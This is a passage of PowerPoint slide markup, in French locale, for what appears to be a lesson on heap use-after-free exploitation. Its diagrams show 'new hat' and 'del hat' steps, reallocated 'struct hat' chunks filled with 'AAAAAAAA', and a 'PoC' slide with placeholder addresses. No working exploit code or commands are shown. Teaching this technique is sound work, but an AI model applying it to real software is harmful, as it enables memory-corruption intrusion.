        <p:spPr>
          <a:xfrm>
            <a:off x="3883448" y="278606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(2)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F62322-7F55-413E-A14A-9AE37051AF7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639616" y="3310760"/>
            <a:ext cx="1619672" cy="2880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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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278152-5E70-4DC3-8F59-9270BBCD6954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4262116" y="3310760"/>
            <a:ext cx="1619672" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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green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3BF3991-21EE-4587-BF1E-8947A1404B24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500846" y="326042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(1)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A9BB07-9834-435F-A49B-9EBCC9F407E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895108" y="3310760"/>
            <a:ext cx="2630190" cy="2880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bigggggggggg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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CE54F5-82BC-4122-81F7-28F492AA29B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639616" y="3771872"/>
            <a:ext cx="1619672" cy="2880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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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11C6A3-8B62-477B-B3F8-68D921864263}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4259288" y="3771872"/>
            <a:ext cx="1619672" cy="2880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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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1C1606-16AC-40AC-A4F8-6BF636B048ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5883872" y="3770486"/>
            <a:ext cx="2630190" cy="2880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bigggggggggg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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853E93-5804-4F67-A26C-85AA30887886}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8525298" y="3770486"/>
            <a:ext cx="3258318" cy="2880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Big </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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8044FD-DEB6-4282-B003-7A6A1BB2D908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2634704" y="4250964"/>
            <a:ext cx="1619672" cy="288032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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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545831-0B27-4129-B065-6990125CF626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4254376" y="4250964"/>
            <a:ext cx="1619672" cy="2880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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 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568176-6737-41DB-831B-C6307CB4808E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5878960" y="4249578"/>
            <a:ext cx="2630190" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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bigggggggggg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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95C12BA-4A3D-4C8E-B0A8-8B920A3D613E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8520386" y="4249578"/>
            <a:ext cx="3268142" cy="2880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Big </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 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F9086E5-1BDA-4F20-A319-5145FBFE8FD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2642444" y="4727284"/>
            <a:ext cx="1619672" cy="288032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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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3B7617-C41D-4422-897B-7E39BA378B0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4262116" y="4727284"/>
            <a:ext cx="1619672" cy="288032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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 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3CF4A70-A880-4B66-AE59-EE1F149A2921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5886700" y="4725898"/>
            <a:ext cx="2630190" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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bigggggggggg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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EE96036-E250-4D0D-9A32-E6BD5812982A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8528126" y="4725898"/>
            <a:ext cx="3268142" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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Big </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 2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FF67DAE-1A09-4EC5-9F33-2755103CECBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040578" y="4189347"/>
            <a:ext cx="64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(1b)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4FD45248-69C2-4360-A33C-CC7C08859CF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3815674" y="4197288"/>
            <a:ext cx="64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(1a)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494D15B-C250-4C84-B4BA-1F249DFB5EB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8045130" y="4669175"/>
            <a:ext cx="56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(1b)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C378E5F3-9E62-4A81-A511-CBD625A968D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3831474" y="4676380"/>
            <a:ext cx="57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(1a)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6F4641EB-9377-489F-B43F-5A6042E40247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11276378" y="4676380"/>
            <a:ext cx="59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(2b)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3ACE4F4-17AD-4315-AFD1-3C6C7249BDC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401380" y="4689550"/>
            <a:ext cx="57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(2a)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C7E274-8654-4FC6-99C6-D3B44A57383E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4262116" y="5208906"/>
            <a:ext cx="1619672" cy="2880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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 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4FE6C0A-3BC9-4DD2-A895-7527C54F0756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5882972" y="5208906"/>
            <a:ext cx="2630190" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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bigggggggggg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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F291587-BA24-4397-B5ED-3B88AE1E1F9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8515474" y="5208906"/>
            <a:ext cx="3280794" cy="288032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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Big </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 2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D033CBC-32FB-4481-80E2-A4017813D06D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040578" y="5154514"/>
            <a:ext cx="59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(1b)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4244AF70-9D49-4E17-9A0B-BA0722F8566F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11276378" y="5183002"/>
            <a:ext cx="65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(2b)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D15972C-11D2-4A34-AC93-D36F060BA5D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2634704" y="5208906"/>
            <a:ext cx="1624584" cy="2880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AAAAAAAA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DA55CD8-33CC-4AF7-8E31-E9891734AC89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455952" y="2320806"/>
            <a:ext cx="203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1. new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>hat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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44BA0489-2841-4E5E-BA02-1EA6F6D7A3AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455952" y="2800701"/>
            <a:ext cx="211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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>del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hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> (0)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C5F9B305-FCC9-4E21-A405-A777C6575961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459913" y="3314696"/>
            <a:ext cx="211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3. new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>hat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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55EF7AFF-C795-4013-B2A8-3E1C33C2A835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455952" y="3721384"/>
            <a:ext cx="211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4. new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>hat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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8AAAA9F0-5B2B-40BA-B7CD-575E7BF0E7E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468174" y="4208928"/>
            <a:ext cx="211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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>del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hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> (1)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9B656C16-CB31-4261-9203-51ED33C8880B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475988" y="4691166"/>
            <a:ext cx="211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6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>del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hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> (2)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1670FF56-446E-4054-AB22-C2C17B812ABB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469142" y="5168256"/>
            <a:ext cx="211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7. new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>hat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Flèche : chevron 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF59A700-EE87-45CB-82F7-B1C4886CF92B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4" name="Flèche : chevron 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD34D08-A992-4387-9488-C6A8543CBDD3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55" name="Flèche : chevron 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9C96C26-D9D9-4243-B6AB-F81966B4D81C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6" name="Flèche : chevron 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69F77E9A-89F6-4040-9AF8-BC4D0D72E1B7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7" name="Flèche : chevron 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE2A2E44-4787-4053-BC52-23D283421260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58" name="Flèche : chevron 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24233E22-37A3-4C97-A850-9CEE8192B1A1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97EB0B2D-41FF-4783-BA0C-731A6A449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13" y="2216676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8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3" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15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41" grpId="0" animBg="1"/>
      <p:bldP spid="42" grpId="0" animBg="1"/>
      <p:bldP spid="43" grpId="0" animBg="1"/>
      <p:bldP spid="44" grpId="0"/>
      <p:bldP spid="45" grpId="0"/>
      <p:bldP spid="46" grpId="0" animBg="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="40" grpId="0"/>
      <p:bldP spid="47" grpId="0"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="49" grpId="0"/>
      <p:bldP spid="50" grpId="0"/>
      <p:bldP spid="5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70F7B7-19CA-46D9-8667-DEF3FDB1A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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free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333639-C9B1-44F0-B150-10BD9D1F0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448072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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31F4AE8-CD2C-43DD-98DA-4C12FFF880A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711624" y="2348880"/>
            <a:ext cx="1675308" cy="4480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0xXXXXXXXX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5617222-2D04-4C83-BBFE-092DFEA6E388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386932" y="2348880"/>
            <a:ext cx="1675308" cy="4480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0xXXXXXXXX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D4CEB30-E618-4022-96FF-A390F284EEF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6062240" y="2348880"/>
            <a:ext cx="1675308" cy="4480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0xXXXXXXXX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2752945-17F6-42E0-9332-0BCF25CB340A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7737548" y="2348880"/>
            <a:ext cx="1675308" cy="4480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0xXXXXXXXX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0E38066-472B-4E53-9A21-D93621E34FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9428472" y="2348880"/>
            <a:ext cx="1675308" cy="4480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…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76BC94A0-195E-4038-ADE8-BE499390AF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1237060" y="234888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collection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59" name="Connecteur : en angle 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3884EAD-0E3B-4148-B6C8-4936C3BCC1C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="53" idx="2"/>
            <a:endCxn id="65" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2769820" y="2926862"/>
            <a:ext cx="909369" cy="649548"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22325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568AC732-D9A4-4BDC-BB11-3D19BEEACA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3714850" y="3706321"/>
            <a:ext cx="1619672" cy="4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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 2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9367992-927D-4D8B-AAE4-ACBD13352F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5327193" y="3706321"/>
            <a:ext cx="2630190" cy="448072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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bigggggggggg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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436E717-38BE-4B80-B2FA-97C433A381F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7957383" y="3706321"/>
            <a:ext cx="3280794" cy="448072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent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Big </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 2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1DB754F0-2628-4F2A-AD8E-2C04168A1F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7480946" y="3665671"/>
            <a:ext cx="59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(1b)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C6AC6CEF-E18F-41CA-817E-3F794C0F8A49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10729112" y="3680417"/>
            <a:ext cx="65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(2b)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B22C614-0773-4199-9457-8B73C259367E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2087438" y="3706321"/>
            <a:ext cx="1624584" cy="4480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AAAAAAAA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CD07F32-CB33-48D7-A33F-DE30341446B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3133005" y="1972935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0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EE3412A2-0561-44C7-8851-3864B5DF78CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828542" y="194863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F99DF4AF-BE05-4606-82E4-4066CDC7B6A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6503850" y="194863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5F10267E-C627-4A71-BF34-A25DC0895A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8189881" y="196007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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Connecteur : en angle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476692EA-CF6D-40E0-8233-512D492A28E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="54" idx="2"/>
            <a:endCxn id="65" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3607474" y="2089208"/>
            <a:ext cx="909369" cy="2324856"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39853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 : en angle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75199CE2-D854-4343-9682-29D392E6A70B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="55" idx="2"/>
            <a:endCxn id="60" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5257606" y="2064032"/>
            <a:ext cx="909369" cy="2375208"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 56458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 : en angle 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4B20662-0C24-46B3-9748-3A70D17685EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="56" idx="2"/>
            <a:endCxn id="60" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6095260" y="1226378"/>
            <a:ext cx="909369" cy="4050516"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 74908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Image 87">
            <a:extLst>
